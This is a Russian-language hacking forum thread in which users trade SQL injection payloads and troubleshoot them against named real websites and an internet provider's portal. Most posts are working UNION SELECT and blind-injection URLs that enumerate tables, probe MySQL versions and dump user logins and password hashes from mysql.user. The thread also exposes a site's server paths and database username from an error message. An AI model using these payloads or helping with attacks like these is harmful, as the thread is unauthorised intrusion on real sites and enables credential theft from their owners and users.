Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://www.mebel24.ru/shopinfo.php?id=-22+union+select+0,table_name,2,3,4,5,6,7,8,9,10,11+from+information_schema.tables/*

    что не подставляю, возвращает ошибку с mysql_num_rows(),версию базу и т.д узнать почемуто можно)(
     
  2. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Велемир я тебе сказал искать конфиги или исходники авторизации админки. Путь у тебя есть, собрать до нужного файла легко

    http://www.mebel24.ru/shopinfo.php?id=-22+union+select+0,version(),2,3,4,5,6,7,8,9,10,11/*

    откдуа ты там схему запрашиваешь, ветка старая, информатион_схема только с 5ой ветке
     
    1 person likes this.
  3. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    Версия mysql 4.1.22, там нету базы information_schema
     
  4. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Сорь...не знал,*пошёл дальше рыскать*
     
  5. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    Ну чтож почти научился SQL инекций) вот токо у меня не получается вывеси логин с хэшем вот например это портал нашего провайдреа :D

    Code:
    http://*********/portal.php?module=news&view_gid=0x3127%20union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8/*
    Ну это покажет версию, базу и имя, вот я подставлял потом такое значение

    Code:
    http://*********/portal.php?module=news&view_gid=0x3127%20union+select+1,2,3,4,user,password,6,7,8+from+mysql.user/*
    
    Токо не пошло, можете обяснить что подставить надо? :) Статьи прочитал подставлял не полуличось, либо я не понял)
     
  6. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    CaNNabi$
    union select 1,2,3,4,user,6,7,8 from mysql.user/*
    либо так
    union select 1,2,3,4,concat_ws(0x3a,user,password),6,7,8 from mysql.user/*
     
    1 person likes this.
  7. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    Спасибо)
     
  8. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Это сработает, если есть доступ к бд mysql, если его нет - проходим лесом))
     
    1 person likes this.
  9. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Invalid Query: select * from item where item_id = -256 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/* && inactive = 'N' Error is: You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2' at line 2

    Выдало ошибку, после того как я подобрал количество столбцов:

    http://www.site.com/product.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/*

    Всё прально ведь,а выдал ошибку (
     
  10. bobob

    bobob Member

    Joined:
    2 Jun 2006
    Messages:
    111
    Likes Received:
    69
    Reputations:
    -15
    линку довай
     
  11. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://www.brunton.com/product.php?id=-256+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/*
     
  12. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    http://www.brunton.com/product.php?id=256%20and%20substring(version(),1,1)=3
    там мускул третий, в нем нет конструкции union select
     
    1 person likes this.
  13. bobob

    bobob Member

    Joined:
    2 Jun 2006
    Messages:
    111
    Likes Received:
    69
    Reputations:
    -15
    ых, кто бы мог подумать)
     
  14. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Ж)))ы откуад ты это взял всякие енд:РРР. Лан пасибо всем :Р
     
  15. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Чет я не фкурил, а где там версия отображается?))
     
  16. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Велемир, ну ты жжешь, она и не должна отображаться просто если выражение substring(version(),1,1 )=3 правильное, то отображается страница http://www.brunton.com/product.php?id=256 , а если нет, то страница не отобразится, попробуй
    http://www.brunton.com/product.php?id=256%20and%20substring(version(),1,1 )=4
    http://www.brunton.com/product.php?id=256%20and%20substring(version(),1,1 )=5
     
  17. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Откуда мне знать-то,впервые вижу такое )).С какой статьи взял?:Р
     
  18. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Warning: mysql_connect() [function.mysql-connect]: User 'u70382875' has exceeded the 'max_user_connections' resource (current value: 5) in /mnt/w0605/d00/s33/b027a354/www/eipcprograms.com/includes/include.php on line 104

    Warning: mysql_query() [function.mysql-query]: in /mnt/w0605/d00/s33/b027a354/www/eipcprograms.com/product.php on line 10

    Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /mnt/w0605/d00/s33/b027a354/www/eipcprograms.com/product.php on line 10
    There has been an error in the database (queryDatabase; SELECT * FROM EIPC_PRODUCT WHERE ID=-16 union select 1,gangsta,3,4,5,6,7,8,9,10,11,12,13*; ;)

    Ваще жесть)))).Только только дошёл до таблицы,и вылетела ошибка.Не совсем понял,че произошло,разъясните ктонить:Р
     
  19. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Сорь,нашёл статью по работе с третьей весии скуля,щас примемся за обучение:Р
     
  20. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://www.eipcprograms.com/product.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables+limit+1,1/*

    Да вродь нет(
     
Thread Status:
Not open for further replies.